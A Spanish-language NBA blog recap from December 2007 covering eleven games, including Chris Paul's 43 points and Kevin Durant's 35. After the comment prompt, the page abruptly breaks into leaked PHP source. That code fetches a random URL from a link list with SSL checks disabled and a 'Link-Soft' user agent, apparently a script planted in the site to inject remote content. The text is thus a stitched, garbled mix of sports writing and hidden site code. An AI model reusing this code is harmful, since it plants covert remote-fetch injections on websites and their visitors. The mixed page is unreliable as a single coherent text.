La crónica (7/12/07)

08 de December de 2007 por Jabho

Como es habitual los fines de semana, madrugada de muchos partidos en la NBA. Los Knicks siguen decepcionando, los Suns ponen ritmo de crucero y encadenan su quinta victoria consecutiva con 19 asistencias de Nash, los Pacers sorprenden a los Magic y demuestran que son capaces de cualquier cosa, los Bulls a los que les sienta bien jugar contra un hueso como Detroit, los Celtics ganan sin despeinarse, Rockets y Hornets ganan con más apuros de los esperados, los Spurs sin Duncan suman y siguen, los 35 puntos de Durant para la victoria de los Sonics, los Kings que empezaron a echar de menos a Martin y los creyentes hundieron un poco más a unos desconocidos Heat…

Te lo contamos todo en la crónica de la jornada.

Knicks 90 – 101 Sixers

El duelo entre dos de los últimos de la conferencia Este se resolvió a favor del de casa. Philadelphia se llevó el partido gracias a que 7 jugadores estuvieron por encima de los 9 puntos. Dalembert destacó en anotación con 20 puntos, Miller cuajó su típico partido completo de otras campañas con 9 puntos, 11 asistencias y 7 rebotes, y Evans estuvo en dobles figuras con 11 puntos y 12 rebotes. Por lo Knicks Crawford brilló con 28 puntos y 8 asistencias y Lee sumó dobles figuras, algo que podría hacer cada noche, con 16 puntos y 11 rebotes. Marbury jugó tras la repentina muerte de su padre aunque no estuvo afortunado. La temporada de Philadelphia se esperaba; la de los Knicks, no tanto ¿Cuanto durará la paciencia?

Suns 122 – 107 Wizards

Resultado engañoso, ya que Phoenix dominaba por 30 al final del 3er cuarto. Y el último cuarto fue aprovechado por Mike D´Antoni para dar descanso a parte de sus titulares. Los dos primeros cuartos transcurrieron a ritmo de gota malaya, y la ventaja de los de Arizona aumentaba poco a poco. En el 3º olvidamos el concepto de gota malaya, y hubo una especie de turbulencia solar. El parcial fue de +19 para Phoenix. El estilete en este periodo fue Raja Bell con sus triples, eso sí, secundado por Nash con sus asistencias ambidiestras (19 asistencias en total). Por la parte capitalina, nos quedamos con los grandes jugadores que son Jamison y Butler, con que Antonio Daniels es capaz de mover el juego mejor que Arenas, con la mejoría en el juego de Haywood… pero un último detalle: faltaba Arenas.

Pacers 115 – 109 Magic

Tremenda remontada de unos Pacers que lo están bordando como visitantes y han ganado 5 de sus últimos 6 partidos como forasteros. En la segunda parte llegaron a estar 15 puntos abajo de los pujantes Orlando Magic, pero de la mano de Granger, con 27 puntos, Tinsley con 20 puntos, 10 asistencias y 7 rebotes, y de 5 compañeros más en dobles figuras, se llevaron el gato al agua, unido a la obsesión por el triple de los chicos de Florida. Por Orlando, la bestia parda siguió a lo suyo: Dwight Howard firmó 30 puntos y 15 rebotes, secundado por Rashard Lewis, con 24 puntos.

Bulls 98 – 91 Pistons

 

Será o no el efecto Ben Wallace pero a estos tristes Bulls de este año les sienta muy bien jugar contra Detroit. El ex-jugador de Detroit, que lleva una temporada irregular, jugó un buen partido en el Auburn Hills con 10 puntos, 13 rebotes, 4 asistencias y 4 tapones, con 8 de 9 desde la linea de tiros libres. Deng y Nocioni fueron los mas destacados en anotación. Otro ex-piston como Smith aportó 14 rebotes. Hinrich estaba amenazado con la suplencia y no lo fue, ya que salió como titular, jugó 42 minutos e hizo un partido correcto. Por parte de los Pistons respondieron Billups, Hamilton y Rasheed Wallace, aunque perdieron la batalla por los rebotes con los Bulls y ahí se fué el partido.

 

 

Raptors 84 – 112 Celtics

Algo menos de un cuarto duró el partido entre dos equipos que deberían estar en los Playoffs por Mayo. Y es que si los Raptors están al 100% el duelo estaría igualado, pero sin Bosh ni Bargnani y en casa de los Celtics el partido estaba sentenciado antes de empezar. Ni Garnett, ni Allen ni Pierce jugaron el el último cuarto del partido. Por Toronto es difícil sacar ninguna conclusión positiva, aunque tampoco negativa. Por Boston ese 10-0 de balance como local es toda una garantía. Y hay que destacar el buen momento de Posey y House saliendo desde el banco.

 

Rockets 96 – 89 Nets

Partido sin historia decidido en los 10 primeros minutos de la mano de Yao Ming, que finalizó con 25 puntos y 11 rebotes, y Tracy McGrady que anotó 24 puntos (13 de ellos en esos primeros minutos), bien secundados por Shane Battier y Rafer Alston. Por los Nets volvió un Jason Kidd bastante desangelado. Solamente Carter con 32 puntos y Jefferson con 29 plantaron resistencia a unos Rockets que parece que comienzan a despegar.

Grizzlies 116 – 118 Hornets

El partido se fue a la prorroga, y estaba empatado a 116 hasta que apareció C3PO Paul para resolver a falta de menos de dos segundos llegando con mucha facilidad hasta debajo de la canasta. Antes Memphis había tenido una bola para resolver pero no supieron. Chris Paul dominó el partido y acabó con 43 puntos y 9 asistencias, dejando además un recital de tiro con 5 de 7 triples y jugándose, y acertando, muchas de las pelotas decisivas tanto del partido como de la prorroga. West con 27 puntos y 9 rebotes, y Chandler con 13 puntos y 19 rebotes le secundaron en la victoria. Por parte de Memphis, Stoudemire fue baja y dejó a Lowry como unico base. Lowry jugó su primer partido como titular en la NBA y rozó el triple-doble con 14 puntos, 9 rebotes y 9 asistencias. Por Memphis, buen partido de casi todos sus titulares, con destacados Gay y Pau, aunque encontraron poca aportación desde el banco.

Jazz 98 – 104 Spurs

Firman los Spurs el mejor inicio de su historia y un 10-0 de balance como local. Y eso que se les presentaba una semana sin Duncan y con Dallas y Utah en el horizonte. Sin Duncan pero con Manu que se abona a los 37 puntos cuando falta el jefe es más fácil ganar los partidos. También con Parker, Finley e incluso el pelirrojo Bonner que salió de titular y cumplió con 13 puntos. U Oberto y sus 11 rebotes salendo desde el banco. Por parte de los Jazz el dúo Deron-Boozer respondió anotando ambos 28 puntos y con 17 rebotes de Carlos y 10 asistencias de Williams.

Clippers 97 – 87 Kings

Se presentaban los Kings con buenas sensaciones tras un arranque irregular. Sin embargo echaron de menos a su máximo anotador, Kevin Martin, que estará fuera entre 4 y 6 semanas, y jugaron un partido flojo. En los Clippers, Kaman ha asumido el rol de jugador franquicia en ausencia de Brand y respondió perfectamente con 26 puntos y 12 rebotes. Esta vez además estuvo bien acompañado por Magette y Thomas con 18 y 17 puntos respectivamente. Por Sacramento el mas destacado fue Artest, que está cuajando una gran temporada despues de perderse los primeros partidos por una sanción.

Heat 113 – Warriors 120

Tremendo culopollo Baron Davis en el último cuarto, dándole la vuelta a un partido que tenían perdido claramente los Warriors. No sólo anotó 13 de sus 25 puntos, sino que secó a Wade, que no es moco de pavo, pasando por encima, junto a sus compañeros, por frescura física a unos envejecidos Heat, lastrados por la lesión de Jason Williams, que estaba dirigiendo francamente bien a su equipo durante la primera parte. Veremos si no crea polémica el hecho de que Shaq no disputara ni un minuto en el último cuarto, y todo ello sumado a sus recientes declaraciones en que pedía más bola en ataque. En los Warriors además de Baron, destacaron Monta Ellis con 21 puntos, 5 rebotes y 4 asistencias, y Stephen Jackson con 28 puntos. Por los Heat los mejores Wade con 33 puntos y 10 asistencias (le tocó jugar de base en la segunda parte como su año rookie), Ricky Davis con 20 puntos y 10 reb, y Dorrell Wright con 19 puntos y 17 rebotes.

Bucks 98 – 104 Sonics

Exhibición anotadora la protagonizada por Michael Redd y Kevin Durant anoche en el Key Arena de Seattle. El particular duelo de pistoleros lo ganó Redd, con 41 puntos, por los 35 anotados por el rookie. Sin embargo, el triunfo fue para Durant y sus Sonics, que contaron con actuaciones clave por parte de Wilcox, Collison y Watson. El protagonista, de todos modos, fue Durant, que a sus puntos añadió 8 rebotes y 5 tapones. Tanto él como Redd firmaron un último cuarto espectacular y con idénticas cifras: 18 puntos con 4 de 7 en tiros de campo y 9 de 10 en tiros libres. La igualdad se mantuvo hasta el final, cuando los compañeros de Durant respondieron mucho mejor que los de Redd y, de este modo, Seattle se anotó su quinta victoria de la temporada (5-15).

 

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>